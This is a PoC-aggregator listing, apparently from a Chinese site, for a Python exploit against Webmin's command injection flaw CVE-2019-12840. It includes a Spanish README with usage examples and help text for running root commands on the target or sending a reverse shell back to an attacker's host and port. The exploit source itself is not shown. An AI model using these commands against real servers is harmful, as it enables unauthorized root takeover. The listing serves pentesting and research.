POC详情: df412c8c86f82333f47c6bfb1a8fcfea81dfee30

来源
关联漏洞
标题: Webmin 操作系统命令注入漏洞 (CVE-2019-12840)
描述:Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.910及之前版本中存在操作系统命令注入漏洞。攻击者可通过向update.cgi文件发送‘data’参数利用该漏洞以root权限执行任意命令。
描述
Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2019-12840 la qual te da un RCE en root
介绍
# Exploit para CVE-2019-12840 en Webmin
Este repositorio contiene un script de Python que explota la vulnerabilidad CVE-2019-12840 en Webmin.

## Descripción
El script intenta iniciar sesión en un servidor Webmin y luego explotar la vulnerabilidad CVE-2019-12840. El script acepta varios argumentos de línea de comandos, incluyendo el nombre de usuario y la contraseña para iniciar sesión en el servidor Webmin, la URL del servidor, el puerto del servidor, el puerto local para el shell reverso, y un comando para ejecutar en el servidor.

## Uso
Para usar este script, debes proporcionar al menos el nombre de usuario, la contraseña y la URL del servidor Webmin. Aquí tienes un ejemplo de cómo usar el script:

```python exploit.py -U username -P password -u http://localhost:10000 -lhost 10.x.x.x -lport 443 ```

## Descripción del Código
El script de Python en este repositorio está estructurado de la siguiente manera:

1. Importación de módulos: El script comienza importando varios módulos de Python necesarios para su funcionamiento. Estos incluyen requests para hacer solicitudes HTTP, argparse para manejar argumentos de línea de comandos, base64 para codificación y decodificación en base64, y BeautifulSoup para analizar HTML.

1. Definición de funciones: El script define varias funciones:

- ```CVE_2019_12840(url,auth_base64,cmd)```: Esta función realiza una solicitud POST a una URL específica con una carga útil específica y verifica la respuesta.
- ```login(username,password,url)```: Esta función intenta iniciar sesión en el servidor Webmin con un nombre de usuario y contraseña proporcionados.
- ```exploit(sid,url,cmd)```: Esta función intenta explotar la vulnerabilidad CVE-2019-12840 en el servidor Webmin.
- ```b64revshell(lhost,lport)```: Esta función genera un shell reverso codificado en base64.
  
3. Manejo de argumentos de línea de comandos: El script acepta varios argumentos de línea de comandos, incluyendo el nombre de usuario y la contraseña para iniciar sesión en el servidor Webmin, la URL del servidor, el puerto del servidor, el puerto local para el shell reverso, y un comando para ejecutar en el servidor.

4. Ejecución del exploit: Si el script se ejecuta como un programa independiente (en lugar de ser importado como un módulo), intentará iniciar sesión en el servidor Webmin y luego ejecutará el exploit.

## Ayuda del Programa
El script acepta varios argumentos de línea de comandos. Aquí tienes un ejemplo de cómo usar el script:

```python3 CVE-2019-12840.py -h```

Esto mostrará la ayuda del programa, que incluye lo siguiente:
```
  _______      ________    ___   ___  __  ___        __ ___   ___  _  _    ___                                      
 / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ |__ \ / _ \| || |  / _ \                                     
| |     \ \  / /| |__ ______ ) | | | || | (_) |______| |  ) | (_) | || |_| | | |                                    
| |      \ \/ / |  __|______/ /| | | || |\__, |______| | / / > _ <|__   _| | | |                                    
| |____   \  /  | |____    / /_| |_| || |  / /       | |/ /_| (_) |  | | | |_| |                                    
 \_____|   \/   |______|  |____|\___/ |_| /_/        |_|____|\___/   |_|  \___/                                     
                                                                                                                    
                           by CyberMonkey                                                                              
                                                                                                                    
             Webmin <= 1.910 RCE (Authorization Required)                                                           
                                                                                                                    
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -c "id"                                 
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -lhost <LOCAL_IP> -lport 443            
                                                                                                                    
                                                                                                                    
usage: CVE-2019-12840.py [-h] -U USERNAME -P PASSWORD -u URL [-p PORT] [-lport LPORT] (-c CMD | -lhost LHOST)

options:
  -h, --help    show this help message and exit
  -U USERNAME   username
  -P PASSWORD   password
  -u URL        target url
  -p PORT       target port
  -lport LPORT  local port for reverse shell
  -c CMD        command to execute
  -lhost LHOST  Send back a reverse shell at port 443
```

## Advertencia
Este script es un exploit de seguridad y sólo debe ser utilizado para fines legítimos, como pruebas de penetración o investigación de seguridad. No debe ser utilizado para actividades ilegales. Además, este script está diseñado para ser utilizado con servidores Webmin vulnerables a la CVE-2019-12840, por lo que puede no funcionar con todas las versiones de Webmin.
文件快照

[4.0K] /data/pocs/df412c8c86f82333f47c6bfb1a8fcfea81dfee30 ├── [5.1K] CVE-2019-12840.py ├── [ 34K] LICENSE.md └── [5.1K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。